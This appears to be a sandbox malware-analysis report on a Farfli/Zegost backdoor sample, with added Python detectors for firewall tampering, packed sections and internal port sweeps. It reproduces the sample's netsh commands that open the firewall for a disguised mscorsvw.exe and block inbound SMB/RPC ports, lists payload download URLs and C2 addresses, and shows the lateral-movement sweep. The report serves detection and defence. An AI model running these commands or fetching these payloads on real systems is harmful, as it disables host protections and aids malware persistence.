Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | July 1, 2024, 9:18 a.m. | July 1, 2024, 9:20 a.m. |
Process | PID | Command line |
---|---|---|
netsh.exe | 2628 | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
netsh.exe | 2680 | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
netsh.exe | 2732 | "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block |
netsh.exe | 2792 | "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1 |
netsh.exe | 2856 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP |
netsh.exe | 2916 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP |
netsh.exe | 2972 | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP |
netsh.exe | 3028 | "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block |
netsh.exe | 744 | "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1 |
netsh.exe | 1728 | "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y |
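The ten netsh invocations above are one procedure: open Windows Firewall in both directions for the dropped mscorsvw.exe, then build an IPsec policy (policy, filter list, three filters for inbound TCP 135/139/445 to this host, a block filter action, a rule tying them together) and assign it, so that the infected machine can no longer be reached over RPC/NetBIOS/SMB by anyone else. The Python below is an added example for this report, not Cuckoo's signature code: it parses netsh command lines of that shape and correlates them into a single finding. SAMPLE_CMDLINES copies the ten command lines from the process tree plus one constructed benign line; the function names, the LATERAL_PORTS set and the verdict strings are assumptions of the example.

```python
"""Flag netsh-based host-firewall tampering in a batch of command lines.

Added example for this report, not Cuckoo's signature code.  SAMPLE_CMDLINES
copies the ten netsh command lines from the process tree above and adds one
constructed benign line; function names, LATERAL_PORTS and the verdict strings
are assumptions of this example.
"""
from __future__ import annotations

import re

# Inbound ports the sample walled off with its IPsec policy: RPC endpoint
# mapper, NetBIOS session service and SMB.
LATERAL_PORTS = {"135", "139", "445"}


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace but keep double-quoted spans (such as the quoted
    netsh path) as one token, with the surrounding quotes removed."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_netsh(cmdline: str) -> tuple[list[str], dict[str, str]] | None:
    """Return (context verbs, key=value arguments) for a netsh invocation,
    or None when the first token is not netsh at all."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    exe = toks[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ("netsh", "netsh.exe"):
        return None
    verbs, kv = [], {}
    for tok in toks[1:]:
        if "=" in tok:
            key, value = tok.split("=", 1)
            kv[key.lower()] = value.strip('"')
        else:
            verbs.append(tok.lower())
    return verbs, kv


def classify(cmdline: str) -> tuple[str, str] | None:
    """Map one command line to a (tag, detail) finding, or None if it is not
    one of the steps we care about."""
    parsed = parse_netsh(cmdline)
    if parsed is None:
        return None
    verbs, kv = parsed
    if verbs[:4] == ["advfirewall", "firewall", "add", "rule"]:
        if kv.get("action", "").lower() == "allow" and "program" in kv:
            return "fw_allow", kv["program"]
        return None
    if verbs[:2] != ["ipsec", "static"]:
        return None
    step = verbs[2:4]
    if step == ["add", "filter"]:
        # dstaddr=Me means "this host"; only inbound filters on the lateral ports count.
        if kv.get("dstaddr", "").lower() == "me" and kv.get("dstport") in LATERAL_PORTS:
            return "ipsec_block_port", kv["dstport"]
    elif step == ["add", "filteraction"] and kv.get("action", "").lower() == "block":
        return "ipsec_block_action", kv.get("name", "")
    elif step == ["set", "policy"] and kv.get("assign", "").lower() in ("y", "yes"):
        return "ipsec_policy_assigned", kv.get("name", "")
    return None


def assess(cmdlines: list[str]) -> dict:
    """Correlate per-line findings: an allow rule for a program together with
    an assigned IPsec policy that blocks SMB/RPC to this host is the pattern."""
    allowed, blocked, block_actions, assigned = set(), set(), [], []
    for line in cmdlines:
        hit = classify(line)
        if hit is None:
            continue
        tag, detail = hit
        if tag == "fw_allow":
            allowed.add(detail)
        elif tag == "ipsec_block_port":
            blocked.add(detail)
        elif tag == "ipsec_block_action":
            block_actions.append(detail)
        elif tag == "ipsec_policy_assigned":
            assigned.append(detail)
    tampering = bool(allowed and blocked and block_actions and assigned)
    return {
        "allowed_programs": sorted(allowed),
        "blocked_ports": sorted(blocked, key=int),
        "block_actions": block_actions,
        "assigned_policies": assigned,
        "verdict": "host firewall tampering" if tampering else "no finding",
    }


# Sample input: the report's process tree, plus one constructed benign line.
NETSH = r'"C:\Windows\System32\netsh.exe"'
MSCORSVW = r"C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe"
SAMPLE_CMDLINES = [
    NETSH + f' advfirewall firewall add rule name="Microsoft.Net" dir=out program="{MSCORSVW}" action=allow',
    NETSH + f' advfirewall firewall add rule name="Microsoft.Net" dir=in program="{MSCORSVW}" action=allow',
    NETSH + " ipsec static add policy name=Block",
    NETSH + " ipsec static add filterlist name=Filter1",
    NETSH + " ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
    NETSH + " ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
    NETSH + " ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",
    NETSH + " ipsec static add filteraction name=FilteraAtion1 action=block",
    NETSH + " ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1",
    NETSH + " ipsec static set policy name=Block assign=y",
    "netsh.exe interface ip show config",  # constructed benign line
]

if __name__ == "__main__":
    for key, value in assess(SAMPLE_CMDLINES).items():
        print(f"{key}: {value}")
```

The per-port filters, the block action and the policy assignment are kept as separate findings on purpose: a legitimate administrator may create an IPsec block policy, but one created seconds after a firewall allow rule for a freshly dropped binary, and assigned immediately, is the sequence worth alerting on.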
IP Address | Status |
---|---|
1.226.84.135 | Active |
104.78.73.222 | Active |
110.11.158.238 | Active |
118.184.169.48 | Active |
119.203.212.165 | Active |
16.162.201.176 | Active |
164.124.101.2 | Active |
172.67.175.23 | Active |
193.228.196.69 | Active |
211.108.60.155 | Active |
31.184.207.62 | Active |
43.198.152.240 | Active |
45.113.194.127 | Active |
51.161.196.188 | Active |
93.189.62.83 | Active |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49935 -> 104.78.73.222:443 | C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com | 2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63 |
TLS 1.2 192.168.56.101:50023 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23 |
TLS 1.2 192.168.56.101:51486 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23 |
TLS 1.2 192.168.56.101:53840 -> 93.189.62.83:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23 |
TLS 1.2 192.168.56.101:54343 -> 193.228.196.69:443 | C=US, O=Let's Encrypt, CN=E5 | CN=api.iproyal.com | 75:ce:fc:4e:72:d9:c8:06:65:40:3b:ca:5a:f6:97:bf:df:c3:e8:ae |
Suspicious feature | Suspicious request |
---|---|
Connection to IP address | GET http://118.184.169.48/dyndns/getip |
Connection to IP address | GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8 |
GET method with no useragent header, Connection to IP address | GET http://43.198.152.240:8080/api/node/ip_validate |
Type | Indicator | Description |
---|---|---|
domain | members.3322.org | |
request | GET http://ssl.ftp21.cc/445.jpg | |
request | GET http://hook.ftp21.cc/MpMgSvc.dll | |
request | GET http://hook.ftp21.cc/MpMgSvc.jpg | |
request | GET http://118.184.169.48/dyndns/getip | |
request | GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8 | |
request | GET http://hook.ftp21.cc/Hooks.jpg | |
request | GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe | |
request | GET http://hook.ftp21.cc/64.jpg | |
request | GET http://down.ftp21.cc/Update.txt | |
request | GET http://43.198.152.240:8080/api/node/ip_validate | |
domain | ssl.ftp21.cc | Cocos Islands domain TLD |
domain | down.ftp21.cc | Cocos Islands domain TLD |
domain | hook.ftp21.cc | Cocos Islands domain TLD |
Resource name | Language | Sublanguage | File type | Offset | Size |
---|---|---|---|---|---|
RT_VERSION | LANG_CHINESE | SUBLANG_CHINESE_SIMPLIFIED | data | 0x0001f05c | 0x000003fc |
file | C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe |
Section | Virtual address | Virtual size | Size of data | Entropy | Description |
---|---|---|---|---|---|
UPX1 | 0x00014000 | 0x0000b000 | 0x0000ac00 | 7.924912120479621 | A section with a high entropy has been found |
entropy | 0.966292134831 | Overall entropy of this PE file is high |
section | UPX0 | Section name indicates UPX |
section | UPX1 | Section name indicates UPX |
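The entropy rows above come from a check that computes the Shannon entropy of each PE section's raw bytes and flags values close to the 8-bit maximum, which is what a compressed or encrypted section looks like. With UPX the layout is characteristic: UPX0 is the virtual-only area the image is unpacked into (no raw data on disk), while UPX1 holds the compressed image, hence the 7.92 on UPX1 alone. As an added example, not Cuckoo's own code, the block below computes that metric over constructed byte strings standing in for the two kinds of section; the 7.0 per-section threshold and the treatment of the 0..1 "overall" figure as whole-file entropy divided by 8 are assumptions of the example.

```python
"""Section-entropy check of the kind behind the 'high entropy' rows above.

Added example, not Cuckoo's code.  The section bytes are constructed here
(a seeded pseudo-random blob standing in for UPX1's compressed image and a
plain-text blob for comparison); the 7.0 threshold and the 'overall' figure
(whole-file entropy divided by 8, its maximum) are assumptions.
"""
from __future__ import annotations

import math
import random
from collections import Counter

HIGH_ENTROPY = 7.0   # bits per byte; 8.0 is the maximum (assumed threshold)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty or single-valued input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_report(sections: list[tuple[str, bytes]]) -> list[dict]:
    """One row per section: size, entropy, whether it trips the threshold,
    and whether the name alone (UPX0/UPX1) already points at the packer."""
    rows = []
    for name, raw in sections:
        h = shannon_entropy(raw)
        rows.append({
            "name": name,
            "size_of_data": len(raw),
            "entropy": round(h, 4),
            "high_entropy": h >= HIGH_ENTROPY,
            "upx_name": name.upper().startswith("UPX"),
        })
    return rows


def overall_entropy(sections: list[tuple[str, bytes]]) -> float:
    """Entropy of all raw section bytes together, scaled to 0..1
    (assumed normalisation for the report's 'overall' figure)."""
    return shannon_entropy(b"".join(raw for _, raw in sections)) / 8.0


# Constructed stand-ins: UPX0 has no raw data (virtual only), UPX1 is dense,
# .rsrc is repetitive text.  Seeded so the run is reproducible.
_rng = random.Random(20240701)
SAMPLE_SECTIONS = [
    ("UPX0", b""),
    ("UPX1", bytes(_rng.getrandbits(8) for _ in range(0xAC00))),
    (".rsrc", b"VS_VERSION_INFO FileDescription ProductName \x00" * 64),
]

if __name__ == "__main__":
    for row in section_report(SAMPLE_SECTIONS):
        print(row)
    print("overall:", round(overall_entropy(SAMPLE_SECTIONS), 4))
```

Entropy alone is a weak signal (legitimate installers and signed binaries carry compressed resources too); it becomes useful combined with the section names, a raw-size-zero first section and, as here, a mismatched file location and vendor-looking firewall rule name.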
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1 |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1 |
cmdline | "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y |
Host |
---|
43.198.152.240 |
51.161.196.188 |
Service name | Service path |
---|---|
clr_optimization_v3.0.30317_32 | C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
cmdline | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow |
Engine | Detection |
---|---|
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.Farfli.4!c |
Elastic | malicious (moderate confidence) |
MicroWorld-eScan | Gen:Heur.Mint.Zard.30 |
CAT-QuickHeal | Trojan.Aksula.A |
Skyhigh | BehavesLike.Win32.Generic.pc |
McAfee | Artemis!3D3AEDFAEAF3 |
Cylance | Unsafe |
VIPRE | Gen:Heur.Mint.Zard.30 |
Sangfor | Suspicious.Win32.Save.a |
K7AntiVirus | Trojan ( 0040f7ad1 ) |
BitDefender | Gen:Heur.Mint.Zard.30 |
K7GW | Trojan ( 0040f7ad1 ) |
Cybereason | malicious.aeaf39 |
Arcabit | Trojan.Mint.Zard.30 |
Baidu | Win32.Trojan.Farfli.bg |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/Farfli.JU |
APEX | Malicious |
Avast | Win32:Evo-gen [Trj] |
Cynet | Malicious (score: 100) |
Kaspersky | UDS:Trojan.Win32.Generic |
Alibaba | Backdoor:Win32/Zegost.24e518cf |
Rising | Backdoor.Farfli!1.B6C5 (CLOUD) |
Emsisoft | Gen:Heur.Mint.Zard.30 (B) |
F-Secure | Trojan.TR/Crypt.FKM.Gen |
DrWeb | Trojan.Siggen28.63414 |
Zillya | Trojan.Farfli.Win32.91278 |
TrendMicro | TROJ_GEN.R002C0DFL24 |
McAfeeD | Real Protect-LS!3D3AEDFAEAF3 |
Trapmine | malicious.moderate.ml.score |
FireEye | Generic.mg.3d3aedfaeaf39544 |
Sophos | Mal/Behav-160 |
Ikarus | Backdoor.Win32.Zegost |
Jiangmin | Trojan.Generic.hoagb |
 | Detected |
Avira | TR/Crypt.FKM.Gen |
Antiy-AVL | Trojan/Win32.Farfli |
Kingsoft | malware.kb.b.888 |
Gridinsoft | Trojan.Win32.Agent.sa |
Xcitium | Backdoor.Win32.Zegost.c@4m3x9i |
Microsoft | Backdoor:Win32/Zegost!pz |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
GData | Gen:Heur.Mint.Zard.30 |
Varist | W32/KillAV.AU.gen!Eldorado |
AhnLab-V3 | Backdoor/Win.NG.R582744 |
BitDefenderTheta | AI:Packer.BC223D901F |
DeepInstinct | MALICIOUS |
VBA32 | BScope.TrojanDDoS.Macri |
Malwarebytes | Trojan.Farfli.UPX |
Dead host (IP:port) |
---|
192.168.3.1:445 |
192.168.3.120:135 |
192.168.3.123:445 |
192.168.3.119:445 |
192.168.0.28:445 |
192.168.0.65:445 |
192.168.3.105:445 |
192.168.3.109:445 |
110.11.158.238:53 |
192.168.3.142:445 |
192.168.0.54:445 |
192.168.3.121:445 |
192.168.3.134:445 |
192.168.3.120:1433 |
192.168.0.200:445 |
192.168.3.86:445 |
192.168.0.188:445 |
192.168.0.63:445 |
192.168.0.36:445 |
192.168.3.90:445 |
192.168.56.101:51321 |
192.168.56.101:50067 |
192.168.0.64:445 |
192.168.0.18:445 |
192.168.0.204:445 |
192.168.0.35:445 |
192.168.0.87:445 |
192.168.3.163:445 |
192.168.3.166:445 |
192.168.3.136:445 |
192.168.56.101:52234 |
192.168.3.97:445 |
192.168.3.102:445 |
192.168.56.101:54177 |
192.168.56.101:54165 |
192.168.56.101:49946 |
192.168.0.104:445 |
192.168.0.37:445 |
192.168.0.58:445 |
192.168.3.148:445 |
192.168.3.1:1433 |
192.168.3.122:1433 |
192.168.56.101:54172 |
192.168.0.19:445 |
192.168.3.85:445 |
192.168.3.128:445 |
192.168.3.103:445 |
192.168.56.101:52247 |
192.168.3.89:445 |
192.168.0.56:445 |
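Dead hosts are connection attempts that never got a reply. Read as a set rather than one by one, the list above is a sweep: dozens of distinct addresses on two private /24s (192.168.0.0/24 and 192.168.3.0/24, neither of which is the analysis network that 192.168.56.101 sits on in the TLS flows) probed on TCP 445, with a few on 135 and 1433, alongside the VM's own ephemeral ports and one external DNS server. The Python below is an added example for this report, not Cuckoo's code: it groups dead_host entries by port and subnet, sets the VM's own address and public addresses aside, and calls a sweep when enough distinct internal hosts were probed on a lateral-movement port. SAMPLE_DEAD_HOSTS copies a subset of the entries above; the analysis VM address 192.168.56.101 and the five-host threshold are assumptions.

```python
"""Summarise Cuckoo dead_host entries to spot an internal port sweep.

Added example for this report, not Cuckoo's own code.  SAMPLE_DEAD_HOSTS is
a subset copied from the dead_host table above; the analysis VM address
(192.168.56.101) and the min_hosts threshold are assumptions.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict

# Ports a worm or lateral-movement module probes on neighbours.
LATERAL_PORTS = {135: "msrpc", 139: "netbios-ssn", 445: "smb", 1433: "mssql"}


def parse_endpoint(entry: str) -> tuple[ipaddress.IPv4Address | ipaddress.IPv6Address, int]:
    """Split 'host:port' into an ip_address object and an int port."""
    host, port = entry.rsplit(":", 1)
    return ipaddress.ip_address(host), int(port)


def summarize(entries: list[str], sandbox_ip: str, min_hosts: int = 5) -> dict:
    """Group unanswered connections by destination port and /24, ignoring the
    sandbox's own address (its ephemeral ports are noise, not targets) and
    keeping public destinations in a separate list for C2/DNS review."""
    sandbox = ipaddress.ip_address(sandbox_ip)
    own_ports: list[int] = []
    external: list[tuple[str, int]] = []
    by_port: dict[int, set] = defaultdict(set)
    for entry in entries:
        ip, port = parse_endpoint(entry)
        if ip == sandbox:
            own_ports.append(port)
        elif not ip.is_private:
            external.append((str(ip), port))
        else:
            by_port[port].add(ip)
    subnets = {
        port: sorted({str(ipaddress.ip_network(f"{ip}/24", strict=False)) for ip in ips})
        for port, ips in by_port.items()
    }
    sweep_ports = sorted(
        p for p, ips in by_port.items() if p in LATERAL_PORTS and len(ips) >= min_hosts
    )
    return {
        "hosts_per_port": {p: len(ips) for p, ips in sorted(by_port.items())},
        "subnets_per_port": subnets,
        "sandbox_own_ports": len(own_ports),
        "external": external,
        "sweep_ports": sweep_ports,
        "verdict": "internal lateral-movement sweep" if sweep_ports else "no sweep",
    }


# Subset of the report's dead_host table (constructed sample input).
SAMPLE_DEAD_HOSTS = [
    "192.168.3.1:445", "192.168.3.120:135", "192.168.3.123:445",
    "192.168.0.28:445", "192.168.0.65:445", "110.11.158.238:53",
    "192.168.3.120:1433", "192.168.56.101:51321", "192.168.56.101:50067",
    "192.168.3.1:1433", "192.168.0.200:445", "192.168.3.86:445",
]

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_DEAD_HOSTS, "192.168.56.101").items():
        print(f"{key}: {value}")
```

The subnet grouping is what distinguishes a hard-coded or previously harvested target list from ordinary ARP-neighbour scanning: when the probed /24s are not the network the sample is running on, the addresses came from the binary or its C2, not from discovery on the box.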